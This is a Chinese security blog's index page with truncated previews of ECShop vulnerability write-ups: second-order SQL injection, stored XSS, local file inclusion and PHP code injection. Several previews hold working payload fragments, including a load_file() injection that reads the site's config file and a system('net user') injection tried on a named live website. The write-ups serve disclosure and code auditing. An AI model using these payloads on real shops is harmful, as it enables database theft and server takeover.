代码审计

5
漏洞提供者:蘑菇街 对蘑菇街表示感谢,本博客欢迎投稿。   一个二次注入,insert型,可直接读取数据库管理员信息 利用过程:找个商品购买,修改颜色单选按钮的value2′),(‘6’, ‘c4598c0015367d28cfcb267fffc750fd’, ’13’, ‘ECS000013’, mid(load_file(‘C:/wamp/www/ec/data/config.php’),70,12......

代码审计

2
漏洞出现在api.php 文件 witch ($_POST['act']) { case 'search_goods_list': search_goods_list(); break; case 'search_products_list': search_products_list(); break; ...... } function search_products_list() { check_auth(); ...... if (!empty($_POST['goods_id']) && is_numeric($_POST['goods_id']) || !empty($_......

代码审计 实用工具

1
一个功能点的SQL注入和存储XSS,内含多种技巧,我觉得我就是个艺术家~~ 刚下的ecshop V2.7.3版本~   1.漏洞存在于站外广告统计功能(对应管理后台的报表统计->站外投放JS),即/affiche.php页面,将from参数(网站来源referer)存储到了数据库表ecs_adsense,而在后台的“站外投放JS”读取出来未过滤又进入了sql语句,导致二次注入。 /affiche.php 119行 $sql = "INSERT INTO " ......

代码审计 实用工具

0
一:goods_attr_id的二次注入 注入利用过程: 1.添加商品到购物车时,写入注入代码到商品属性id http://localhost/test/ecshop/flow.php?step=add_to_cart POST: goods={"quick":1,"spec":["163","158'"],"goods_id":32,"number":"1","parent":0}   注意,需要spec有两个或以上id 2.在查看购物车页面,点击更新购物车,执行注入代码(二次注入嘛,单引号可用了) 代码分析 1......

实用工具

2
轻松无压力,以下结果由【Seay源代码审计系统1.0】自动生成,没有经过人工处理。报告显示效果不好,请点击上面的【全屏阅读】查看      Seay代码审计系统漏洞报告 审计结果:发现可疑漏洞总数:29个 ID 漏洞描述 文件路径 漏洞详细 1 存在敏感信息泄露漏洞 http://localhost/ecshop//search.php?encode[]=Seay <br /> <......

代码审计 实用工具

3
我到官网去看了下,目前官网已经取消该补丁下载   ecshop被收购后,就不知道是怎么了 2013年5月7号更新的7号补丁,但是下载下来后,我发现明显不对。 第一,includes目录里面多了个install文件夹,原来是没有这个文件夹的,并且里面全是js(最后发现这个目录根本没用到,骇客大哥你做事情能仔细点不) 第二,admin/js目录里面全部js都上来了(后面通过文件比较发现只有一个文件有修改)......

代码审计 实用工具

0
  漏洞作者:360 漏洞分析:Seay 博客:www.cnseay.com 今天习惯性的到处逛,看看文章。看到了360爆的一个ecshop 支付宝支付插件的注入漏洞,照例的分析下,360的团队还是挺赞的。 由于漏洞源于ecshop的支付宝支付插件,所有利用前提是站点安装此插件,利用不受GPC影响。 漏洞核心代码在\includes\modules\payment\alipay.php 文件 respond()函数,第215行。 ......

代码审计 实用工具

0
近日,360网站安全检测平台独家发现网店系统ECShop支付宝插件存在高危0day漏洞。黑客可利用SQL注入绕过系统限制获取网站数据,进而实施“拖库”窃取网站资料。由于ECShop与电子商务关系密切,涉及网上钱财交易,一旦该漏洞被大范围利用,将造成严重后果。对此,360已于第一时间向ECShop通报了该漏洞细节并协助推出官方修复补丁 ECShop是一款热门的B2C网店建站系统,国外很多知名企业和个人用户都在使用ECS......

代码审计

0
前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。     漏洞关键文件:     /includes/lib_order.php     关键函数: 01     function available_shipping_list($region_id_list) 02 {   03     $sql = ‘SELECT s.shipping_id, s.shipping_code, s.shipping_name, ‘ . 04             ......

实用工具

0day漏洞:ECShop全版本注入0day及修复

发表于4年前 | 作者: seay

1
感谢欠杀的黑盒 把任意商品加入购物车在填写配送地址那一页,有地区选择 flow.php?step=consignee&direct_shopping=1 比如省选择安徽 其中POST数据如下 country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&be......

代码审计 实用工具

0
C0deplay Team    j8g    看代码    /* 修改个人资料的处理 */ elseif ($action == ‘act_edit_profile’) {     include_once(ROOT_PATH . ‘includes/lib_transaction.php’);       $birthday = trim($_POST[‘birthdayYear’]) .’-‘. trim($_POST[‘birthdayMonth’]) .’-‘.     trim($_POST[‘birthdayDay’]);     $e......

实用工具

ecshop远程代码执行漏洞

发表于4年前 | 作者: seay

2
Php code injection Target:http://www.cunlide.com/(可能是作者网站) ecshop 版本不祥 貌似09 awvs 扫之存在sql注入、php code injection、等等多种漏洞。 开始试验各种exp 无果 Php code injection 需要post提交这个蛋疼么 system 权限  act=forget_pwd&action=get_pwd&email=${@print(system(‘net user’))}&user_name=furybijj 无果 二蛋说去掉system之后改%60  act=forge......

实用工具

ECshop本地包含漏洞

发表于5年前 | 作者: seay

0
js/calendar.php $lang = (!empty($_GET[‘lang’])) ? trim($_GET[‘lang’]) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x......